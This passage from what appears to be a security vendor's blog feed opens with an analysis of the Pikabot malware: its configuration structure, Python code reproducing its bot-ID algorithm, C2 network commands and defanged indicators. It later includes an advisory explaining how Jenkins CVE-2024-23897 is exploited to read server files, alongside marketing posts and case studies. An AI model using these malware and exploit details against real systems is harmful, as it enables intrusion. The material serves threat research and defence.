is_cnc_unavailable; cncs_info* next_cnc_ptr; };Bot configurationThe latest version of Pikabot stores its entire configuration in plaintext in one address. This is a significant drawback since in previous versions, Pikabot decrypted each required element at runtime and only when required. In addition, many of the configuration elements (e.g. command-and-control URIs) were randomized. ANALYST NOTE: Despite their randomization, all configuration elements were valid on the server-side. If a bot sent incorrect information, then it would get rejected/banned by the command-and-control server.The configuration structure is the following:struct configuration { int number_of_swap_rounds_number_of_bytes_to_read_from_end; // During the bot initialization process, this member represents the number of bytes to read from the end of the configuration block. size_t len_remaining_structure; // Size of the remaining structure's data minus the last element wchar_t* bot_minor_version; // E.g. 32-beta. In some samples, this member contains both the major and minor versions of the bot. size_t len_campaign_name; wchar_t* campaign_name; size_t len_unknown_registry_key_name; wchar_t* unknown_registry_key_name; // Used only in the network command 0x246F. size_t len_user_agent; wchar_t* user_agent; size_t number_of_http_headers; wchar_string request_headers[number_of_http_headers]; int number_of_cnc_uris; wchar_string cnc_uris[number_of_cnc_uris]; int number_of_cncs; cnc cns[number_of_cns]; int beacon_time_ms; int delay_time_ms; int delay_seed_mul; // Multiplies this value with the calculated value of the operation - delay_seed_mul * 1000. int maximum_cnc_connection_attempts; size_t len_bot_version // major version + minor version wchar_t* major_version; // 1.8. int len_remaining_bytes_to_read; // Added to the first member and shows how many more bytes to read right after `len_remaining_structure` }; struct wchar_string { size_t length; wchar_t* wstring; }; struct cnc { size_t len_cnc; wchar_t* cnc; int cnc_port; int connection_attempts; bool http_connection_settings; };Once Pikabot parses the plaintext configuration, it erases it by setting all bytes to zero. We assess that this is an anti-dumping method to avoid automating the extraction of the configuration.Lastly, Pikabot loads any remaining required Windows API functions and generates a bot identifier for the compromised host. The algorithm is similar to previous versions and can be reproduced with the following Python code.def checksum(input: int) -> int: return (0x10E1 * input + 0x1538) & 0xffffffff def generate_bot_id_set_1(host_info: bytes, volume_serial_number: int) -> int: for current_character in host_info.lower(): volume_serial_number *= 5 volume_serial_number += current_character bot_id_part_1 = checksum(volume_serial_number & 0xffffffff) return bot_id_part_1 def generate_bot_id_set_2(volume_serial_number: int) -> int: bot_id_part_2 = checksum(volume_serial_number) bot_id_part_2 = checksum(bot_id_part_2) return bot_id_part_2 def generate_bot_id_set_3(bot_id_part_2: int) -> int: out = [] for i in range(8): bot_id_part_2 = checksum(bot_id_part_2) out.append(bot_id_part_2 & 0xff) out = bytes(out[-4:]) return int.from_bytes(out, byteorder='little') host_info = b"username|hostname" volume_serial_number = int("",16) bot_id_part_1 = generate_bot_id_set_1(host_info, volume_serial_number) bot_id_part_2 = generate_bot_id_set_2(volume_serial_number) bot_id_part_3 = generate_bot_id_set_3(bot_id_part_2) bot_id = f"{bot_id_part_1:07X}{bot_id_part_2 & 0xffff:09X}{bot_id_part_3}"ANALYST NOTE: In some samples, Pikabot does not read the volume serial number due to a bug in their code that causes a failure when calling GetVolumeInformationW.Network communicationsPikabot contacts the command-and-control server to request and receive network commands. In this version, the network protocol has considerably changed. Pikabot starts by registering the compromised host to its server. First, Pikabot collects information from the compromised host, such as:Monitor’s display settingsWindows versionHostname/username and operating system’s memory sizeBeacon and delay settingsProcess information such as the process ID, parent process ID and number of threads (see the description of network command 0x985 for a comprehensive list).Bot’s version and campaign nameName of the domain controllerThen Pikabot appends the following information to the registration packet:32-bytes network RC4 key (unique per host), which remains the same for the session. In previous versions, Pikabot was using AES-CBC with a random key/IV per request.Unknown registry key name. We observed it used only in the network command with ID 0x246F.Number of swap rounds used for encoding the data. This remains the same for the rest of the session.Next, Pikabot encrypts the data using the RC4 algorithm, encodes the encrypted output, picks a random URI from its list, and sends the data with a POST request to the command-and-control server.The encoding involves bytes swapping for N times, where N is a randomly generated number in the range 0-25.ANALYST NOTE: Despite the fact that a round number is set in the configuration (see the configuration structure), this value is ignored and Pikabot replaces it with a random value. Moreover, Pikabot has completely removed the JSON format in its network packets and inserts everything in a raw format.If the bot registration is successful, Pikabot starts an infinite loop to request and execute commands. Each incoming network command (with the exception of network command with ID 0x164) has a task ID that is placed at the start of the (decrypted) packet as a QWORD value. In Table 1 below, we list the identified network commands along with a description of their functionality.Command IDDescription0x164Requests command from command-and-control server. The packet includes the command ID, size of bot ID, and the bot ID. The server replies with the same command ID if there is no network command for the bot to execute.0x555Reports the output of the executed network command to the command-and-control server.0x1291Registers the bot. An unknown integer value (0x1687) is appended in the packet at offset 8.0x1FEDUpdates beacon time.0x1A5ATerminates/kills the bot.0x2672Not implemented0x246FWrites a file to disk and adds registry data using the value name specified in the configuration (unknown_registry_key_name).0xACBExecutes the system command and sends back the output. Includes the error code 0x1B3 if there is no output.0x36CInjects the code of a downloaded PE file. The target process information is specified in the network packet.0x792Injects the code of a downloaded shellcode. The target process information is specified in the network packet.0x359Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x3A6Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x240Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x985Collects processes’ information. These are:Executable's filenameProcess IDBoolean flag, which indicates if it is a Pikabot process.Boolean flag, which indicates if Pikabot can access the process with all possible access rights.Number of threadsBase priority of threadsProcess architectureParent process ID0x982Not implementedTable 1. Pikabot Network CommandsConclusion Despite its recent inactivity, Pikabot continues to pose a significant cyber threat and is in constant development. However, the developers have decided to take a different approach and decrease the complexity level of Pikabot's code by removing advanced obfuscation features. Moreover, based on our code analysis, it appears that certain features and network commands have not been implemented yet and are still a work in progress. Zscaler ThreatLabz continues to track this threat and add detections to protect our customers. Indicators Of Compromise (IOCs) SHA256 Description 555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f Pikabot sample (version 1.8.32-beta) ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d Pikabot sample (version 1.8.32-beta) IOC Description 104.129.55[.]103:2224 Command-and-Control server 178.18.246[.]136:2078 Command-and-Control server 158.220.80[.]167:2967 Command-and-Control server 104.129.55[.]104:2223 Command-and-Control server 23.226.138[.]161:5242 Command-and-Control server 37.60.242[.]85:9785 Command-and-Control server 23.226.138[.]143:2083 Command-and-Control server 37.60.242[.]86:2967 Command-and-Control server 85.239.243[.]155:5000 Command-and-Control server 158.220.80[.]157:9785 Command-and-Control server 65.20.66[.]218:5938 Command-and-Control server 95.179.191[.]137:5938 Command-and-Control server 139.84.237[.]229:2967 Command-and-Control server Zscaler Coverage In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names: Win32.Trojan.PikaBot Win32.Downloader.PikaBot Mon, 12 Feb 2024 10:11:52 -0800 Nikolaos Pantazopoulos Start Your Journey in IT Support: A Beginner's Guide Navigating the nuances of IT troubleshooting can be challenging, especially if you're just starting out. Our ebook, A Beginner’s Guide to Troubleshooting Devices, Networks, and Applications for Service Desk Teams, breaks down the essentials of IT support in a clear, digestible format, making it a great resource for newcomers who are eager to become influential service desk team members. It’s a practical guide even for those with limited time. Whether you're dealing with device issues, network complexities, or application troubleshooting, you’ll find step-by-step instructions that are easy to follow even with minimal IT knowledge. We’ve designed this guide to help you enhance your troubleshooting skills, gain the confidence you need to master IT problem-solving, and become a valuable asset to any service desk team. In this ebook, you'll find: An overview of service desk challenges: Understand the evolving IT landscape and the pivotal role of IT support in maintaining productivity. Step-by-step ticket resolution processes: Learn how to handle and resolve IT issues, enhancing customer satisfaction efficiently. Categorization of IT issues: Familiarize yourself with common problems in devices, networks, and applications, along with strategies to tackle them. A focus on device, networking, and application issues: Gain insights into specific challenges in these areas and learn practical solutions. Strategies to enhance troubleshooting workflows: Discover how to streamline IT support processes and use advanced technologies for better problem-solving. It’s also an excellent tool for service desk managers to expedite team onboarding. By equipping your team with this resource, you’ll enable them to handle a wide range of IT issues independently. It reduces the need for escalations and empowers analysts to solve problems efficiently. Ultimately, it can help not only enhance your service desk team’s capabilities, but also significantly shorten the time it takes for new analysts to become proficient. Download the ebook today and transform your service desk team! Fri, 09 Feb 2024 19:14:07 -0800 Rohit Goyal Cushman & Wakefield’s Roadmap for Consolidating and Simplifying Security with Zscaler Cushman & Wakefield’s Roadmap for Consolidating and Simplifying Security with Zscaler As a CISO leading the cybersecurity program at Cushman & Wakefield, one of the world's largest commercial real estate services firms, I can attest that it has been a truly transformative journey. When I joined the company over five years ago, I had clear priorities: improve SaaS application performance for our distributed, mostly mobile workforce, now more than 52,000 employees, simplify network architecture, and accelerate integration of mergers and acquisitions (M&As). My vision was to evolve Cushman & Wakefield’s security approach from a legacy on-premises infrastructure to cloud-based security as a service. As we set our sights on a cloud-first and partner-first model, we aimed to shrink the size and number of our data centers. Our intent was to streamline our infrastructure and build a coordinated security ecosystem with an eye toward gaining operational efficiencies. Equally important was providing our globally dispersed users with faster, more secure access to the more than 200 SaaS applications they rely on every day. To achieve these goals, we turned to the Zscaler Zero Trust Exchange—and it has proven to be the perfect fit for our strategic vision. Zscaler has been at the core of our success and continues to be at the center of our ongoing security transformation journey. A phased approach to our Zscaler implementation In 2019, we made a strategic decision to adopt SD-WAN to improve SaaS connectivity across our more than 400 branch offices. That’s when we adopted Zscaler. We selected Zscaler Internet Access (ZIA), part of the Zero Trust Exchange, as our security solution because it interoperates seamlessly with the SD-WAN and enables secure local internet breakouts without the high costs and complexity of on-premises firewall appliances. The joint solution provided consistent protection and significantly better performance for our users on any device anywhere. Additionally, our security team had complete visibility over what was happening on the network and who was using which applications. This allowed us to manage bandwidth and prioritize traffic to business-critical applications and limit the impact of streaming and social media traffic. We’re continuing to modernize our branch offices but are moving to a café model, where users can securely connect to corporate resources without VPN or SD-WAN. Zscaler is making this change possible. Looking ahead, we also plan to implement Zscaler Private Access more broadly to provide secure access to private applications as we establish offices in new regions. Following the user during the pandemic and beyond At every stage of our implementation, we found that Zscaler delivered value in new ways. Even before the COVID-19 pandemic, a significant portion of our workforce was operating remotely. When the pandemic struck, we were well prepared. Zscaler Client Connector had already been deployed on all devices, so we maintained business continuity. When a leader asked me what my plan was for security at the time, I just shrugged my shoulders and informed him that we already had all our bases covered with Zscaler and Crowdstrike being the primary components. Zscaler integrations for a coordinated security ecosystem After the positive experience we had with the Zscaler integration, we are impressed with how easy and seamless it is to integrate other tools in our security stack with Zscaler. Recently, we integrated Zscaler with CrowdStrike for an added layer of protection: Zscaler only allows devices that meet CrowdStrike’s Zero Trust Assessment (ZTA) score threshold to access sensitive applications. By sharing real-time threat intelligence, data alerts, and device health information, the Zscaler-CrowdStrike integration has reduced the number of security events. As we move forward with building out our zero trust architecture and creating a unified security ecosystem, we plan to leverage Zscaler’s open API more fully to maximize our other security investments. We’re looking at ways to broaden threat intelligence sharing, gain more visibility, and engage automation to a greater degree. At the top of my to-do list are integrating with CrowdStrike Falcon LogScale, its next-generation SIEM and log management tool, and with Mimecast, the cloud-based email security and management system used by all our employees.. Future focus: expanding Zscaler capabilities Risk management I also look forward to evaluating the new AI-powered capabilities like Zscaler Risk360 to gain visibility into risk in all areas of our environment. Once it’s in place, Zscaler Risk360’s visualization framework will generate risk posture profiles using real data in our environment combined with global security research from Zscaler ThreatLabz. The ability to quickly identify and respond to critical vulnerabilities will enhance our proactive protection, enable us to communicate security priorities in a quantifiable way, and help us build a data-driven case as we advocate for additional resources. M&A integration Over the years, most of our growth has been fueled by M&As. We plan on leveraging Zscaler to integrate acquired companies and enable these new users to have access to business-critical applications in days rather than months. Combating data loss and insider threats We are also on a mission to curb data loss overall and to combat insider threats, whether due to negligence or malicious motives. These challenging tasks are made easier with the multi-pronged defense made possible by the zero trust architecture we have in place and continue to build on. By ensuring least privilege access and preventing lateral movement, we are limiting potential damage from abuse of insider access. The Zscaler’s Zero Trust Exchange plays a critical role in keeping these threats at bay by minimizing the attack surface—users connect only to a single application, not to the network. As we continue on our zero trust journey, enhancing data protection in this age of generative AI engines like ChatGPT is a top priority. Zscaler’s inline TLS/SSL traffic inspection will be essential for preventing the leakage of sensitive data by identifying and blocking attempted unauthorized uploads to AI tools and across all our cloud apps. Gaining deeper visibility into user activity is another focus area. While most of our employees are trusted, honest professionals, mistakes happen. By implementing deception tools such as honeypots and lures, our security team will receive alerts to help them detect anomalous insider behavior faster. This significantly reduces dwell time for any potential incidents. A partnership for the long haul As CISO, my aim is to continue delivering seamless access and robust security for our global staff as we grow our business and expand our presence and offer new services. The flexible, scalable Zero Trust Exchange aligns with this goal. Our partnership with Zscaler has been integral to Cushman & Wakefield’s cloud-first journey. Together, we’ve shifted from legacy networks to a unified, user-centric security model that enables productivity and protection anywhere. I am confident that our journey toward a more secure and efficient future will continue successfully with Zscaler as our trusted partner. The results we have achieved thus far speak for themselves. To learn more, read the case study. Thu, 15 Feb 2024 08:37:55 -0800 Erik Hart How Zscaler’s Powerful Integrations Help the State of Oklahoma Efficiently Do More with Less How Zscaler’s Powerful Integrations Help the State of Oklahoma Efficiently Do More with Less On any given day, our team of security professionals who comprise the OMES Oklahoma Cyber Command stay on top of up to 17 million potential threats ranging from phishing and credential compromise to ransomware and data breaches. Dedicated to securing the digital assets of the State of Oklahoma government, these members are also stewards of massive amounts of sensitive personal and healthcare data—from our more than 30,000 employees and the nearly 4 million state residents served by our more than 180 agencies. Thanks to the Zscaler Zero Trust Exchange platform, we are successfully managing this high volume of threats and safeguarding the vital data we have been entrusted with. One of the Zscaler superpowers we have come to rely on is its integration capabilities. By working in sync with other components of our security stack, Zscaler has taken us to the next level of our security maturity and zero trust transformation. Keep pace by unifying security We know that the spiraling volume of threats will always be a challenge, especially now that cybercriminals are beginning to leverage AI for malicious purposes. When new security challenges emerge, we need to be able to respond at lightning speed. Amid all the change and complexity in the security and technology landscape, I’m finding that the solution is to simplify and unify our security infrastructure. One of the ways we have done that is by taking full advantage of Zscaler’s powerful integration capabilities. When you work with a single unified platform, it almost forces efficiency, and it certainly aids in the ongoing battle most state governments face of having to do more with less. Integrations provide a holistic view One of the things that differentiates Zscaler from other solutions is its open application programming interface (API), which has made it easy to integrate with our existing security solutions. In our environment, we’ve found that Zscaler plays well with other core tools we rely on—namely CrowdStrike and Splunk—in how it shares threat intelligence data and coordinates protection and incident response. The ability to tie these security tools together increases telemetry and gives us the opportunity to stop lateral threats before they become bigger problems that could potentially affect our users and our citizens. Zscaler-CrowdStrike integration curbs lateral threat movement By sharing telemetry and threat intelligence data between the CrowdStrike platform and the Zscaler Zero Trust Exchange, access policies can automatically be adapted according to changing user context, device health, and newly detected threats, making investigation and response faster and more effective. For example, let’s say we know there’s an attack occurring—maybe the next SolarWinds or a user just installed a new, unauthorized app that has weakened the endpoint posture. With the Zscaler-CrowdStrike integration, CrowdStrike can detect the change and recalculate the Falcon Zero Trust Assessment (ZTA) score and share it with Zscaler. Based on the updated ZTA score, Zscaler policy control can automatically adapt to a stricter threshold to only allow access via a browser isolation session or even block the connection to protect against access to selected mission-critical applications. Furthermore, the sharing of telemetry and threat intelligence is key to expanded visibility of the threat landscape, from endpoint to applications. After all, it wouldn’t be efficient if one security system knows something is critically important and doesn’t share this with another security domain! As an inline security cloud, Zscaler can intercept any unknown zero-day payloads before they reach an endpoint and share the telemetry with CrowdStrike. This helps us quickly assess the existence of any such zero-day payload in the entire endpoint environment and provides the basis for automated cross-platform response workflow. This helps stop threats from moving laterally into critical systems, such as a database server housing financial information. Zscaler-Splunk integration provides a centralized view The Zscaler-Splunk integration gives us extensive analytics for in-depth visibility into usage, access, and the overall environment. The analytics correlate data, helping us perform proactive threat hunting and investigations by enabling us to identify abnormal patterns. Zscaler’s data logs correspond to the same schema as Splunk, so it makes correlation searches easy. Zscaler logs are sent via a secure HTTPS push and delivered to Splunk’s HTTP Event Collector reliably and securely. Once in Splunk, the logs are normalized, which allows correlation across all data sources, providing end-to-end visibility. Splunk’s robust analytics include risk-based alerting (RBA) and user and entity behavior analytics (UEBA). The tight integration simplifies security operations by reducing the need for our team to constantly swivel from one security console to another to get the information they need. The Splunk analytics dashboard serves as the hub of this wheel of zero trust protection. It shows activity across the enterprise in real time, regardless of user location. As a result of the Zscaler-Splunk integration, our security operations team has experienced significant gains in speed and efficiency. In the past, I would have needed three to five different solutions to accomplish what Zscaler and its integrations can do on their own. We would not be as far along our path to zero trust as we are now without a platform like the Zscaler Zero Trust Exchange to help us out. It has exponentially improved our cybersecurity, and I’m proud to be a part of the amazing things that my team does every day to protect our employees and our citizens. Read the case study to learn more about the State of Oklahoma’s Zscaler Zero Trust Exchange deployment. Thu, 08 Feb 2024 16:11:39 -0800 Michael Toland Now and Next: How Zscaler is Transforming to Fuel Channel Success Looking back at 2023, it was impossible to escape the constant buzz surrounding cybersecurity incidents in the market. But amid the chaos, one thing became clear: the cybersecurity market was booming and the role of leaders and partners in ensuring customer safety was crucial. The same still rings true in 2024. As the cyber security market continues to evolve, Zscaler is proud to be at the forefront of innovation, and now, we’ve put the programs in place to allow our partners thrive in this digital era alongside us. Both for what’s now… and what’s next. As we step into the second half of Zscaler’s fiscal year, we’re proud to showcase to partners the army of new opportunities we’ve designed to grow their business, maximize earnings, and elevate their skills. This includes a revamped incentive structure and new selling motions that empower partners with more collaborative selling opportunities throughout the sales cycle to deliver the greatest customer experience in their journey to digital transformation. We have transformed our partnering foundation to provide comprehensive support throughout the customer lifecycle. You’ve probably heard me say it before, zero trust is a team sport. In the 1H half of the year, we took on both an internal and external transformation to ensure that we have purposeful alignment, process, and engagement with our partners throughout the customer lifecycle. This means, from the earliest stages of our world-class sales process to the final delivery, our partners are integrated every step of the way, embedding their services and support to help our customers transition from legacy appliances to a true zero trust model. We’re leading the charge with the market-leading platform, and now the most lucrative incentive framework, in the market today. With the most comprehensive platform in the market today, Zscaler leads the charge. And now, we have introduced the most lucrative incentive framework to match. Over the past six months, my team and I hit the road to listen to our partners and understand what they truly desire in a partnership. One thing stood out loud and clear: they want to work with vendors who offer the most comprehensive security platform and drive profitability. That's why we have enhanced our incentives framework and channel-led selling motion, offering larger payouts, increased discount advantages, and performance bonuses. We want our partners to earn more and thrive in the cloud security market, establishing themselves as trusted advisors. As the digital landscape continues to evolve, Zscaler remains dedicated to supporting partners in driving customer success and achieving mutual growth. We’re empowering our partners to thrive in the cloud security market and establish themselves as trusted advisors. We know that for Zscaler and our partners alike, our number one commitment is driving customer success in the ever-evolving digital era. That’s why Zscaler not only continues to innovate its cloud security offerings to address emerging threats and challenges, but in the first half of our year, we simplified our certifications to help our partners become experts and build practices around zero trust. We also launched targeted enablement around Zscaler-powered customer outcomes to help our partners lead the way as trusted advisors to our customers. But our journey is far from over. As we enter the second half of our fiscal year, we have more exciting announcements lined up to fuel partner success. We will introduce new offerings and specializations to help partners seamlessly integrate Zscaler into their practices. We will optimize our collaborative partnering approach and launch industry-leading tools to make Zscaler the easiest to do business with in the industry. We’ll also continue to be in the field with you each and every day, to make sure our valued partners have the support to deliver transformational outcomes to our customers. We have achieved a lot in the first half of the year with your feedback and support throughout this transformative journey. We are fully dedicated to supporting our partners in reaching their maximum potential with Zscaler, both with what’s now and what’s next. Together, we are changing the channel and revolutionizing the cybersecurity market. Thu, 08 Feb 2024 05:00:02 -0800 Karl Soderlund Jenkins Arbitrary File Leak Vulnerability, CVE-2024-23897, Can Lead To RCE Introduction Jenkins, a Java-based open-source automation server widely used by developers for application building, testing, and deployment, has issued an advisory about a critical vulnerability that could potentially enable remote code execution (RCE). This vulnerability, identified as CVE-2024-23897, poses a high risk and affects Jenkins integrated command line interfaces (CLI). With a CVSS score of 9.8, unauthorized access to files through the CLI is possible, potentially leading to RCE. In addition to file access, CVE-2024-23897 can be leveraged to access binary files that contain cryptographic keys utilized for various Jenkins functionalities, albeit with certain limitations. Unauthorized access to this sensitive information can result in: RCE through the exploitation of resource root URLs RCE by manipulating a "Remember me" cookie RCE through stored cross-site scripting (XSS) attacks via build logs RCE by bypassing CSRF protection Decryption of stored secrets in Jenkins Deletion of any item within Jenkins The downloading of Java heap dumps Affected Versions The vulnerability affects Jenkins versions up to 2.441 and LTS (Long-Term Support) versions up to 2.426.2. Technical Details The vulnerability originates from Jenkins' use of the args4j library for parsing command arguments and options on the Jenkins controller during the processing of CLI commands. Originally intended to enhance usability, a specific feature within args4j that replaces a file path preceded by an "@" character with the file's contents has become a significant security issue. This feature is enabled by default and remains unchecked in versions up to 2.441 and LTS 2.426.2. Exploiting this vulnerability allows attackers to read any files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. When Jenkins CLI tool arguments are prefixed with “@”, they are mistakenly interpreted as files that need to be opened to read the arguments. In certain scenarios, lines from these files are inadvertently included in error messages and transmitted to the CLI user. Two Jenkins configuration options pose significant security risks by allowing unauthenticated attackers to impersonate authenticated users. The first option, “Allow users to register,” enables anyone with access to a Jenkins instance to register an account. Additionally, the “Enable anonymous read permission” option grants universal read permissions, allowing any Jenkins user to access and read the entire content of arbitrary files on the Jenkins server when these options are enabled. Figure 1. Jenkins configuration options The figure below is an example taking the first rows of the C:\Users\IEUser\AppData\Local\Temp\JenkinsTest.txt (a random file created on the Jenkins server for demonstration) file using the CLI help command. Figure 2. A demonstration text file created on the Jenkins server There are two ways to invoke this vulnerability: Using Jenkins-cli.jar: This common approach involves utilizing Jenkins-cli.jar, which operates through web sockets or SSH. Specifically, commands such as shutdown, enable-job, help, and connect-node from the Jenkins CLI tool are manipulated to illicitly access and read the content of files on the Jenkins server. The figure below shows the help command running on Jenkins CLI to read a file. Figure 3. Running the help command with Jenkins CLI tool to read the file content on Jenkins The figure below shows the file content being read from the Jenkins server. Figure 4: File content read from the Jenkins server Sending POST requests: An alternative method is to send two POST requests to http://jenkins/cli?remoting=false. This technique requires the use of a downloader and an uploader. The downloader fetches the response of the CLI command, while the uploader executes a specified CLI command provided in the body of the request. The connection between the downloader and uploader is established by utilizing the UUID from the session header. Figure 5. Attack workflow demonstrating malicious HTTP request Recommendations To mitigate this vulnerability, upgrade to at least Jenkins versions 2.442 and LTS 2.426.3. This patch disables the command parser feature responsible for the vulnerability. Those unable to immediately update to Jenkins 2.442 and LTS 2.426.3 should disable access to the Jenkins CLI, as this is expected to prevent exploitation. For instructions, see the documentation for this workaround. Zscaler Coverage The Zscaler ThreatLabZ team has deployed protection. Zscaler Advanced Threat Protection: APP.EXPLOIT.CVE-2024-23897 References CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible Jenkins Security Advisory 2024-01-24 - binganao/CVE-2024-23897 · GitHub RCE Jenkins CVE-2024–23897. Background Story | by Syed Abeer Ahmed Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read ≈ Packet Storm Tue, 06 Feb 2024 15:44:05 -0800 Avinash Kumar IoT/OT Predictions for 2024 How many smart home devices are you running where you live? Smart speakers, thermostats, cameras, light bulbs, etc. Have you lost count yet? You could be forgiven, because Forbes projects there could be as many as 207 billion of these devices out in the world by the end of this year! By my calculation that works out to more than 25 devices for every human on the planet! In this blog, we’ll cover some of the top IoT/OT predictions for 2024, covering everything from AI at the edge to ransomware. Let’s jump in. IoT/OT devices will see a higher degree of proliferation than ever before Losing count of how many devices you have isn’t just a nuisance in the workplace; it’s a very real problem, particularly from a cybersecurity perspective. The challenge of keeping track of your IoT devices—not to mention keeping them secure—is only going to grow harder with the proliferation of sensors, monitors, point-of-sale, and myriad other devices that are feeding our hunger for data. Fortunately we’ve been working on that. Edge AI will make these devices smarter, faster No predictions blog post for 2024 would be complete without mention of the topic on everyone’s lips: artificial intelligence. Edge AI is already finding its way onto some smartphones, and as the technology advances, its inclusion in IoT/OT is inevitable. It will only improve as time passes, increasing the number of autonomous decisions being made without oversight. This can easily be positioned as a benefit, especially in remote locations where humans cannot or do not want to be, but it can also be a risk, if mishandled. 5G and other WAN connectivity will evolve to meet the needs of IoT/OT It seems we’ve been hearing about 5G forever, but it’s now starting to truly gain traction in the workplace as a new way to connect devices via the internet with minimal latency and without requiring a local network infrastructure. And it’s not alone—newer versions of the Wi-Fi standard, LPWAN, and even satellite connectivity are also coming to the forefront. This simply means we’re able to deploy sensors and other kinds of IoT devices into more locations, including remote and mobile ones, growing the number of potential use cases for the technology. Digital twins will still serve as proving grounds The accelerated growth in the number of sensors continues to cultivate the use of digital twins; virtual representations of the world around them that help us visualize and improve remote systems. Once again, the proliferation of IoT sensors will provide an even richer and more accurate view of what we’re monitoring. This will enable us to drive resource optimization and efficiency, and pave the way for the adoption of more sustainable systems. Taking all of these developments in aggregate, it’s plain to see that when it comes to IoT and OT growth, ‘we ain’t seen nothing yet’! As with all technological advances, there’s the potential that they will make our lives better and businesses more efficient and profitable. At the same time, it’s vital to ensure security is consideration number one when it comes to planning their deployment, especially when it comes to devices that talk to the internet. This brings us to the flip side of these predictions: the challenges they pose. Data privacy The combination of ubiquitous sensors and the rise of AI making use of the data they collect naturally leads us to consider data privacy. Regulations around the world, perhaps most famously the EU’s GDPR, ensure that privacy is a requirement rather than a consideration. The handling of potentially sensitive data is strictly controlled, and its misuse can significantly undermine public confidence, not to mention lead to potentially huge fines. Never is this a greater problem than when such data is leaked or exfiltrated from its owner for potentially nefarious uses. Ransomware on the (continued) rise As the Zscaler ThreatLabz team recently reminded us, ransomware attacks have risen sharply over the past year, over 37% in fact. At the same time, it’s becoming easier than ever to launch such attacks, aided by readily available AI and Ransomware-as-a-Service (RaaS) kits. The firmware problem Remember earlier when I asked you if you knew how many devices you have deployed? Here’s another one for you. Of those devices, how many of them have their firmware up to date? Do you even know what firmware they’re running to be able to establish this? An IoT device may have been secure on the day it shipped, but as our own computers and smartphones have taught us, regular updates are a fact of life in the cat-and-mouse game of vulnerability. A single compromised device could be all an attacker needs to begin their hunt for more damage to cause or data to steal. The ongoing risks presented by legacy security As the cybersecurity industry continues to incessantly point out, traditional security technology practices, many still employed by IT departments around the world, are fundamentally flawed. The ongoing use of firewalls and VPNs opens the door for lateral movement across networks and geographical boundaries, allowing bad actors the opportunity to reach the countless IoT/OT devices in use. Once the network is compromised, the bounty for an attacker grows ever larger. All of these challenges and more point to only one conclusion: Organizations must adopt a zero trust security architecture in order to protect the IoT and OT devices they will inevitably deploy this year. Conclusion On the one hand, the predictions for IoT/OT in 2024 are worth getting excited about. Our world is getting smarter, and advances in devices will no doubt help us drive improvements in our personal and professional lives. But to benefit positively we must put security first. This doesn’t mean adding more and more roadblocks on the network highways. It means reimagining security and building a framework based on the tenets of zero trust. If you’re new to zero trust and want to learn more, we’d like to welcome you to one of our monthly introductory live webinars where you can explore the many benefits of zero trust and why Zscaler delivers it better than anyone else. Click here and search ‘start here’ to find the next session to sign-up for. Tue, 06 Feb 2024 01:00:02 -0800 Simon Tompson Why Firewalls and VPNs Give You a False Sense of Security Firewalls and VPNs were once hailed as the ultimate solutions for robust enterprise security, but in today’s evolving threat landscape, organizations face a growing number of breaches and vulnerabilities that are outpacing these solutions. Today, the world we work in looks very different from the on-premises era as industries transform how and where work gets done. Firewalls and VPNs are crumbling pillars of a bygone era. They provide a false sense of security because they come with significant weaknesses that put companies at risk—weaknesses that are only realized when embracing digital transformation. Innovation in generative AI, automation, and IoT/OT technologies across industries is set to continue breaking barriers in 2024. This innovation also opens the door for attackers to automate phishing campaigns, craft evasive malware, reduce the development time of threats using AI, and even sell Ransomware-as-a-Service (RaaS). With the growing severity and number of breaches, there’s a heightened concern that VPN vulnerabilities will leave the door open for attackers. According to a Cybersecurity Insider survey, nearly 50% of organizations experienced VPN-related attacks from July 2022 to July 2023, and 90% of organizations are concerned about attackers exploiting third-party vendors to gain backdoor access into their networks through VPNs. It’s becoming clear that even the largest organizations with advanced firewalls still fall victim to breaches. Curious to know some of the reasons that firewalls and VPNs are letting organizations down? Read more below. A thinner sheet of protection across a larger attack surface VPNs and firewalls extend the network, increasing the attack surface with public IP addresses as they connect more users, devices, locations, and clouds. Users can now work from anywhere with an internet connection, further extending the network. The proliferation of IoT devices has also increased the number of Wi-Fi access points across this extended network, including that seemingly harmless Wi-Fi connected espresso machine needed for a post-lunch boost, creating new attack vectors to exploit. Perimeter-based architecture means more work for IT teams More doesn’t mean better when it comes to firewalls and VPNs. Expanding a perimeter-based security architecture rooted in firewalls and VPNs means more deployments, more overhead costs, more time wasted for IT teams - but less security and less peace of mind. Pain also comes in the form of degraded user experience and satisfaction with VPN technology for the entire organization due to backhauling traffic (72% of organizations are slightly to extremely dissatisfied with their VPN experience). Other challenges like the cost and complexity of patch management, security updates, software upgrades, and constantly refreshing aging equipment as an organization grows are enough to exhaust even the largest and most efficient IT teams. The bigger the network, the more operational complexity and time required. VPNs and firewalls can’t effectively guard against today’s threat landscape VPNs and firewalls deployed to protect and defend network access behave a lot like a security guard who sits at the front of a store in order to stop theft. Security Guards Firewalls and VPNs Stationed at the front door of a valuable store - tasked with identifying and stopping attacks. Can’t monitor all entrances at the same time. Deployed at key access points to an organization’s network. Can’t stop all the threats across every access point. Once an attacker gets in, they get access to the entire store. Permit lateral threat movement by placing users and entities onto the network. 1:few threat detection can’t scale unless you hire a lot of security guards to monitor all entrances. Can’t inspect encrypted traffic and enforce real-time security policies at scale. Can be slow, tired, expensive to hire, late for their shift and present a number of other issues that allow threats to go undetected and unanswered. Suffer from a variety of other challenges related to cost, complexity, operational inefficiency, poor user experiences, organizational rigidity, and more. Much like a lone security guard, VPNs and firewalls can help mitigate some risk, but they can’t keep up with the scale and complexity of the cybercrime of today. Your network is extending exponentially as you digitally transform your organization. With constant attacks on the horizon and a thinner cover of protection, how many million security guards can you hire? The Zero Trust Exchange delivers on the promise of security Unlike network-centric technologies like VPNs - zero trust architecture minimizes your attack surface and connects users to the apps they need directly—without putting anyone or anything on the network as a whole. Zscaler delivers zero trust with its cloud native platform: the Zscaler Zero Trust Exchange. The Zero Trust Exchange starts with the premise that no user, workload, or device is inherently trusted. The platform brokers a secure connection between a user, workload, or device and an application—over any network, from anywhere by looking at identity, app policies, and risk. As threats grow more dangerous, we can’t rely on a single 